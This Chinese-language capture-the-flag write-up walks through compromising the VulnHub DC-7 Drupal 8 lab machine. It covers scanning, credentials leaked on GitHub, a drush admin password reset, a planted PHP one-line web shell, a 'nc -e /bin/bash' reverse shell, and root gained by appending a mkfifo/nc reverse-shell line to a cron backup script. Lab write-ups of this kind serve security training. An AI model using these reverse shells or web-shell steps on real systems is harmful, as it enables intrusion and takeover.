靶機DC-7下載地址:https://download.vulnhub.com/dc/DC-7.zip
環境:VMware 15虛擬機軟件
DC-7靶機IP地址:192.168.146.138
Kali的IP地址:192.168.146.130
文章目錄
第一部分 信息收集
第一步 掃描主機
[nmap -sP 192.168.146.0/24]
第二步 掃描端口
[nmap -sV 192.168.146.138]
第三步 收集網站信息
[whatweb http://192.168.146.138]
( 使用Drupal 8搭建的網站)
第四步 訪問80端口
第五步 收集@DC7USER信息
發現是一個Twitter用戶,進入Twitter後搜索這個用戶,進入這個用戶首頁,發現一個GitHub的鏈接
[ https://github.com/Dc7User?tab=repositories]
[ https://github.com/Dc7User/staffdb]
第六步 下載源碼 收集文件信息
dc7user
MdR3xOgB7#dW
第二部分 漏洞查找
第一步 ssh登錄dc7user賬號
[ssh [email protected]]
第二步 查找文件
[ls]
[cat mbox]
[cd /var/scripts]
[cat backups.sh]
第三步 Drupal重置網站管理員密碼
[cd /var/www/html/]
[drush user-password admin --password=“qweasd”]
第四步 登錄admin賬號
第三部分 漏洞利用(Drupal 8文件上傳漏洞)
第一步 收集Drupal 8信息
[ https://www.drupal.org/project/php]
[https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz]
第二步 配置php代碼
在Content—>Add content–>Basic page下,準備添加PHP代碼反彈shell,
第三步 寫入一句話木馬(也可以上傳其他可利用的木馬文件)
修改"welcome to dc-7"–>選擇php編碼–>寫入一句話木馬–>保存
第四步 連接到靶機(也可直接操作不用反彈到kali)
第五步 反彈shell到kali
[nc -e /bin/bash 192.168.146.130 9999]
第四部分 提權
第一步 進入交互shell
[python -c ‘import pty;pty.spawn("/bin/bash")’]
第二步 查看可利用文件
在/opt/scripts目錄下的backups.sh腳本文件所屬組是www-data
第三步 當前用戶 是www-data
第四步 獲取root權限
寫入反彈shell代碼到backups.sh腳本文件中,並在kali監聽777端口,等待計劃任務執行,稍微等待後成功getshell
[echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.146.130 4567 >/tmp/f” >> backups.sh]
[cd ]
[cat theflag.txt]